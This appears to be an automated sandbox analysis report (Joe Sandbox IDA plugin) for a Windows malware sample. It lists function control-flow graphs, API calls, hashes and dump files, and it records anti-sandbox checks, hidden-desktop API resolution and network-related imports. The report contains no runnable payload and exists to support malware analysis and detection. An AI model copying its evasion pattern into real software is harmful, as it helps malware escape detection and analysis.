                                  control_flow_graph 2141 321bf0-321c0b call 302a90 call 326390 2146 321c1a-321c27 call 302930 2141->2146 2147 321c0d 2141->2147 2151 321c35-321c63 2146->2151 2152 321c29-321c2f lstrcpy 2146->2152 2148 321c10-321c18 2147->2148 2148->2146 2148->2148 2156 321c65-321c67 ExitProcess 2151->2156 2157 321c6d-321c7b GetSystemInfo 2151->2157 2152->2151 2158 321c85-321ca0 call 301030 call 3010c0 GetUserDefaultLangID 2157->2158 2159 321c7d-321c7f ExitProcess 2157->2159 2164 321ca2-321ca9 2158->2164 2165 321cb8-321cca call 322ad0 call 323e10 2158->2165 2164->2165 2166 321cb0-321cb2 ExitProcess 2164->2166 2171 321ce7-321d06 lstrlen call 302930 2165->2171 2172 321ccc-321cde call 322a40 call 323e10 2165->2172 2177 321d23-321d40 lstrlen call 302930 2171->2177 2178 321d08-321d0d 2171->2178 2172->2171 2185 321ce0-321ce1 ExitProcess 2172->2185 2186 321d42-321d44 2177->2186 2187 321d5a-321d7b call 322ad0 lstrlen call 302930 2177->2187 2178->2177 2180 321d0f-321d11 2178->2180 2180->2177 2183 321d13-321d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 321d46-321d54 lstrcpy lstrcat 2186->2188 2193 321d9a-321db4 lstrlen call 302930 2187->2193 2194 321d7d-321d7f 2187->2194 2188->2187 2199 321db6-321db8 2193->2199 2200 321dce-321deb call 322a40 lstrlen call 302930 2193->2200 2194->2193 2196 321d81-321d85 2194->2196 2196->2193 2197 321d87-321d94 lstrcpy lstrcat 2196->2197 2197->2193 2199->2200 2201 321dba-321dc8 lstrcpy lstrcat 2199->2201 2206 321e0a-321e0f 2200->2206 2207 321ded-321def 2200->2207 2201->2200 2209 321e11 call 302a20 2206->2209 2210 321e16-321e22 call 302930 2206->2210 2207->2206 2208 321df1-321df5 2207->2208 2208->2206 2213 321df7-321e04 lstrcpy lstrcat 2208->2213 2209->2210 2215 321e30-321e66 call 302a20 * 5 OpenEventA 2210->2215 2216 321e24-321e26 2210->2216 2213->2206 2228 321e68-321e8a CloseHandle Sleep OpenEventA 2215->2228 2229 321e8c-321ea0 CreateEventA call 321b20 call 31ffd0 2215->2229 2216->2215 2217 321e28-321e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 321ea5-321eae CloseHandle ExitProcess 2229->2233
                                  APIs
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020558), ref: 003263E9
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020810), ref: 00326402
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020828), ref: 0032641A
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020708), ref: 00326432
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01028B60), ref: 0032644B
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01016680), ref: 00326463
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010166E0), ref: 0032647B
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020720), ref: 00326494
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020750), ref: 003264AC
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010205A0), ref: 003264C4
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010207B0), ref: 003264DD
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01016980), ref: 003264F5
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010207C8), ref: 0032650D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00321C2F
                                  • ExitProcess.KERNEL32 ref: 00321C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00321C71
                                  • ExitProcess.KERNEL32 ref: 00321C7F
                                    • Part of subcall function 00301030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                    • Part of subcall function 00301030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                    • Part of subcall function 00301030: ExitProcess.KERNEL32 ref: 00301058
                                    • Part of subcall function 003010C0: GlobalMemoryStatusEx.KERNEL32 ref: 003010EA
                                    • Part of subcall function 003010C0: ExitProcess.KERNEL32 ref: 00301114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00321C8F
                                  • ExitProcess.KERNEL32 ref: 00321CB2
                                  • ExitProcess.KERNEL32 ref: 00321CE1
                                  • lstrlen.KERNEL32(01028B10), ref: 00321CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321D15
                                  • lstrcat.KERNEL32(00000000,01028B10), ref: 00321D1D
                                  • lstrlen.KERNEL32(00334B98), ref: 00321D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321D48
                                  • lstrcat.KERNEL32(00000000,00334B98), ref: 00321D54
                                  • lstrlen.KERNEL32(00000000), ref: 00321D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321D94
                                  • lstrlen.KERNEL32(00334B98), ref: 00321D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321DBC
                                  • lstrcat.KERNEL32(00000000,00334B98), ref: 00321DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00321DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 83f95d2c75fbd2b8b7dcdb838ef0b7d0ff85831825617323d94f622f79e90ad2
                                  • Instruction ID: a44886143b398b2d5a76466eb609b3bc6d28c313c108c795a5c9b5741b36c55b
                                  • Opcode Fuzzy Hash: 83f95d2c75fbd2b8b7dcdb838ef0b7d0ff85831825617323d94f622f79e90ad2
                                  • Instruction Fuzzy Hash: 0471B371501326EBD727ABB4ED8DB7F7A79AF60701F050024F906AA2A1DF74D809DB60
                                  Function 00304A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2850 304a60-304afc RtlAllocateHeap 2867 304b7a-304bbe VirtualProtect 2850->2867 2868 304afe-304b03 2850->2868 2869 304b06-304b78 2868->2869 2869->2867
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00304AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00304BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: b028fdc4049f6489d8068c248805657d34b4d25f48316169331710ab82fd5206
                                  • Instruction ID: 6047d677a34a285a8f56f5dd2d7dce558b3db0878b733f55bed653351a1be1da
                                  • Opcode Fuzzy Hash: b028fdc4049f6489d8068c248805657d34b4d25f48316169331710ab82fd5206
                                  • Instruction Fuzzy Hash: 5C31D628B8022D76C622EBEF4CC7FDF6E55DF85B60F024096F54857190CBA16581CBE2
                                  Function 00322A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00322A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: fbf2f1aa3d757f157c10cce205b76cd5791a52563ba34b353dd0f113ae099ae5
                                  • Instruction ID: 61a87018bc46733d5d055a65dedb31e62fc4a916748e15912237593efb4c222c
                                  • Opcode Fuzzy Hash: fbf2f1aa3d757f157c10cce205b76cd5791a52563ba34b353dd0f113ae099ae5
                                  • Instruction Fuzzy Hash: ACF0B4B1A44614ABC700DF88DD49B9EBBBCF704B21F000216FA15E3380D7B4190486A1
                                  Function 003266E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 3266e0-3266e7 634 326afe-326b92 LoadLibraryA * 8 633->634 635 3266ed-326af9 GetProcAddress * 43 633->635 636 326b94-326c03 GetProcAddress * 5 634->636 637 326c08-326c0f 634->637 635->634 636->637 638 326cd2-326cd9 637->638 639 326c15-326ccd GetProcAddress * 8 637->639 640 326cdb-326d4a GetProcAddress * 5 638->640 641 326d4f-326d56 638->641 639->638 640->641 642 326de9-326df0 641->642 643 326d5c-326de4 GetProcAddress * 6 641->643 644 326f10-326f17 642->644 645 326df6-326f0b GetProcAddress * 12 642->645 643->642 646 326f19-326f88 GetProcAddress * 5 644->646 647 326f8d-326f94 644->647 645->644 646->647 648 326fc1-326fc8 647->648 649 326f96-326fbc GetProcAddress * 2 647->649 650 326ff5-326ffc 648->650 651 326fca-326ff0 GetProcAddress * 2 648->651 649->648 652 327002-3270e8 GetProcAddress * 10 650->652 653 3270ed-3270f4 650->653 651->650 652->653 654 327152-327159 653->654 655 3270f6-32714d GetProcAddress * 4 653->655 656 32715b-327169 GetProcAddress 654->656 657 32716e-327175 654->657 655->654 656->657 658 3271d3 657->658 659 327177-3271ce GetProcAddress * 4 657->659 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01016720), ref: 003266F5
                                  • GetProcAddress.KERNEL32(75900000,01016940), ref: 0032670D
                                  • GetProcAddress.KERNEL32(75900000,01028EF8), ref: 00326726
                                  • GetProcAddress.KERNEL32(75900000,01028F28), ref: 0032673E
                                  • GetProcAddress.KERNEL32(75900000,0102CC48), ref: 00326756
                                  • GetProcAddress.KERNEL32(75900000,0102CCF0), ref: 0032676F
                                  • GetProcAddress.KERNEL32(75900000,0101AF00), ref: 00326787
                                  • GetProcAddress.KERNEL32(75900000,0102CED0), ref: 0032679F
                                  • GetProcAddress.KERNEL32(75900000,0102CC00), ref: 003267B8
                                  • GetProcAddress.KERNEL32(75900000,0102CCA8), ref: 003267D0
                                  • GetProcAddress.KERNEL32(75900000,0102CCD8), ref: 003267E8
                                  • GetProcAddress.KERNEL32(75900000,01016700), ref: 00326801
                                  • GetProcAddress.KERNEL32(75900000,01016A20), ref: 00326819
                                  • GetProcAddress.KERNEL32(75900000,01016760), ref: 00326831
                                  • GetProcAddress.KERNEL32(75900000,010167C0), ref: 0032684A
                                  • GetProcAddress.KERNEL32(75900000,0102CD68), ref: 00326862
                                  • GetProcAddress.KERNEL32(75900000,0102CE58), ref: 0032687A
                                  • GetProcAddress.KERNEL32(75900000,0101B158), ref: 00326893
                                  • GetProcAddress.KERNEL32(75900000,01016920), ref: 003268AB
                                  • GetProcAddress.KERNEL32(75900000,0102CD08), ref: 003268C3
                                  • GetProcAddress.KERNEL32(75900000,0102CC18), ref: 003268DC
                                  • GetProcAddress.KERNEL32(75900000,0102CEE8), ref: 003268F4
                                  • GetProcAddress.KERNEL32(75900000,0102CC30), ref: 0032690C
                                  • GetProcAddress.KERNEL32(75900000,01016960), ref: 00326925
                                  • GetProcAddress.KERNEL32(75900000,0102CD20), ref: 0032693D
                                  • GetProcAddress.KERNEL32(75900000,0102CC60), ref: 00326955
                                  • GetProcAddress.KERNEL32(75900000,0102CE40), ref: 0032696E
                                  • GetProcAddress.KERNEL32(75900000,0102CE70), ref: 00326986
                                  • GetProcAddress.KERNEL32(75900000,0102CD80), ref: 0032699E
                                  • GetProcAddress.KERNEL32(75900000,0102CDE0), ref: 003269B7
                                  • GetProcAddress.KERNEL32(75900000,0102CE10), ref: 003269CF
                                  • GetProcAddress.KERNEL32(75900000,0102CE88), ref: 003269E7
                                  • GetProcAddress.KERNEL32(75900000,0102CC78), ref: 00326A00
                                  • GetProcAddress.KERNEL32(75900000,01029E18), ref: 00326A18
                                  • GetProcAddress.KERNEL32(75900000,0102CEA0), ref: 00326A30
                                  • GetProcAddress.KERNEL32(75900000,0102CD98), ref: 00326A49
                                  • GetProcAddress.KERNEL32(75900000,010169A0), ref: 00326A61
                                  • GetProcAddress.KERNEL32(75900000,0102CD38), ref: 00326A79
                                  • GetProcAddress.KERNEL32(75900000,010166A0), ref: 00326A92
                                  • GetProcAddress.KERNEL32(75900000,0102CC90), ref: 00326AAA
                                  • GetProcAddress.KERNEL32(75900000,0102CEB8), ref: 00326AC2
                                  • GetProcAddress.KERNEL32(75900000,010162E0), ref: 00326ADB
                                  • GetProcAddress.KERNEL32(75900000,01016520), ref: 00326AF3
                                  • LoadLibraryA.KERNEL32(0102CCC0,0032051F), ref: 00326B05
                                  • LoadLibraryA.KERNEL32(0102CDB0), ref: 00326B16
                                  • LoadLibraryA.KERNEL32(0102CD50), ref: 00326B28
                                  • LoadLibraryA.KERNEL32(0102CDC8), ref: 00326B3A
                                  • LoadLibraryA.KERNEL32(0102CDF8), ref: 00326B4B
                                  • LoadLibraryA.KERNEL32(0102CE28), ref: 00326B5D
                                  • LoadLibraryA.KERNEL32(0102CF18), ref: 00326B6F
                                  • LoadLibraryA.KERNEL32(0102CFC0), ref: 00326B80
                                  • GetProcAddress.KERNEL32(75FD0000,01016480), ref: 00326B9C
                                  • GetProcAddress.KERNEL32(75FD0000,0102D050), ref: 00326BB4
                                  • GetProcAddress.KERNEL32(75FD0000,010289F0), ref: 00326BCD
                                  • GetProcAddress.KERNEL32(75FD0000,0102D098), ref: 00326BE5
                                  • GetProcAddress.KERNEL32(75FD0000,010162A0), ref: 00326BFD
                                  • GetProcAddress.KERNEL32(734B0000,0101B1A8), ref: 00326C1D
                                  • GetProcAddress.KERNEL32(734B0000,010162C0), ref: 00326C35
                                  • GetProcAddress.KERNEL32(734B0000,0101AFC8), ref: 00326C4E
                                  • GetProcAddress.KERNEL32(734B0000,0102CF90), ref: 00326C66
                                  • GetProcAddress.KERNEL32(734B0000,0102D038), ref: 00326C7E
                                  • GetProcAddress.KERNEL32(734B0000,01016460), ref: 00326C97
                                  • GetProcAddress.KERNEL32(734B0000,01016580), ref: 00326CAF
                                  • GetProcAddress.KERNEL32(734B0000,0102D008), ref: 00326CC7
                                  • GetProcAddress.KERNEL32(763B0000,01016640), ref: 00326CE3
                                  • GetProcAddress.KERNEL32(763B0000,01016300), ref: 00326CFB
                                  • GetProcAddress.KERNEL32(763B0000,0102D068), ref: 00326D14
                                  • GetProcAddress.KERNEL32(763B0000,0102D080), ref: 00326D2C
                                  • GetProcAddress.KERNEL32(763B0000,01016320), ref: 00326D44
                                  • GetProcAddress.KERNEL32(750F0000,0101B180), ref: 00326D64
                                  • GetProcAddress.KERNEL32(750F0000,0101AF28), ref: 00326D7C
                                  • GetProcAddress.KERNEL32(750F0000,0102CF30), ref: 00326D95
                                  • GetProcAddress.KERNEL32(750F0000,01016380), ref: 00326DAD
                                  • GetProcAddress.KERNEL32(750F0000,010163A0), ref: 00326DC5
                                  • GetProcAddress.KERNEL32(750F0000,0101AFF0), ref: 00326DDE
                                  • GetProcAddress.KERNEL32(75A50000,0102D020), ref: 00326DFE
                                  • GetProcAddress.KERNEL32(75A50000,010164A0), ref: 00326E16
                                  • GetProcAddress.KERNEL32(75A50000,01028A10), ref: 00326E2F
                                  • GetProcAddress.KERNEL32(75A50000,0102CFD8), ref: 00326E47
                                  • GetProcAddress.KERNEL32(75A50000,0102D0B0), ref: 00326E5F
                                  • GetProcAddress.KERNEL32(75A50000,010163C0), ref: 00326E78
                                  • GetProcAddress.KERNEL32(75A50000,010164E0), ref: 00326E90
                                  • GetProcAddress.KERNEL32(75A50000,0102CF00), ref: 00326EA8
                                  • GetProcAddress.KERNEL32(75A50000,0102CF48), ref: 00326EC1
                                  • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00326ED7
                                  • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00326EEE
                                  • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00326F05
                                  • GetProcAddress.KERNEL32(75070000,010163E0), ref: 00326F21
                                  • GetProcAddress.KERNEL32(75070000,0102CFA8), ref: 00326F39
                                  • GetProcAddress.KERNEL32(75070000,0102CF60), ref: 00326F52
                                  • GetProcAddress.KERNEL32(75070000,0102CF78), ref: 00326F6A
                                  • GetProcAddress.KERNEL32(75070000,0102CFF0), ref: 00326F82
                                  • GetProcAddress.KERNEL32(74E50000,01016540), ref: 00326F9E
                                  • GetProcAddress.KERNEL32(74E50000,010164C0), ref: 00326FB6
                                  • GetProcAddress.KERNEL32(75320000,01016500), ref: 00326FD2
                                  • GetProcAddress.KERNEL32(75320000,0102C990), ref: 00326FEA
                                  • GetProcAddress.KERNEL32(6F060000,01016340), ref: 0032700A
                                  • GetProcAddress.KERNEL32(6F060000,01016620), ref: 00327022
                                  • GetProcAddress.KERNEL32(6F060000,010165E0), ref: 0032703B
                                  • GetProcAddress.KERNEL32(6F060000,0102CA08), ref: 00327053
                                  • GetProcAddress.KERNEL32(6F060000,01016600), ref: 0032706B
                                  • GetProcAddress.KERNEL32(6F060000,01016280), ref: 00327084
                                  • GetProcAddress.KERNEL32(6F060000,01016660), ref: 0032709C
                                  • GetProcAddress.KERNEL32(6F060000,01016360), ref: 003270B4
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 003270CB
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 003270E2
                                  • GetProcAddress.KERNEL32(74E00000,0102CA38), ref: 003270FE
                                  • GetProcAddress.KERNEL32(74E00000,01028AA0), ref: 00327116
                                  • GetProcAddress.KERNEL32(74E00000,0102CB58), ref: 0032712F
                                  • GetProcAddress.KERNEL32(74E00000,0102C900), ref: 00327147
                                  • GetProcAddress.KERNEL32(74DF0000,01016400), ref: 00327163
                                  • GetProcAddress.KERNEL32(6E100000,0102CA50), ref: 0032717F
                                  • GetProcAddress.KERNEL32(6E100000,01016560), ref: 00327197
                                  • GetProcAddress.KERNEL32(6E100000,0102C948), ref: 003271B0
                                  • GetProcAddress.KERNEL32(6E100000,0102CAE0), ref: 003271C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 498d8e097fd1245376f3fa5601e23e36c0f85ef0a4309777a9bec05bac484a2f
                                  • Instruction ID: 7b272e497b4c632cc989ca6d6cf40436c849c5b2746fab7e5cec66afe3ca6be0
                                  • Opcode Fuzzy Hash: 498d8e097fd1245376f3fa5601e23e36c0f85ef0a4309777a9bec05bac484a2f
                                  • Instruction Fuzzy Hash: EC622CF9A107009FD75CDF65EE8CA2637B9F7A87013108919F956C3364DAB4A808FB60
                                  Function 0031F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F1D5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F1F1
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F1FC
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F215
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F220
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F239
                                  • lstrcpy.KERNEL32(00000000,00334FA0), ref: 0031F25E
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F28C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F2C0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F2F0
                                  • lstrlen.KERNEL32(010169E0), ref: 0031F315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
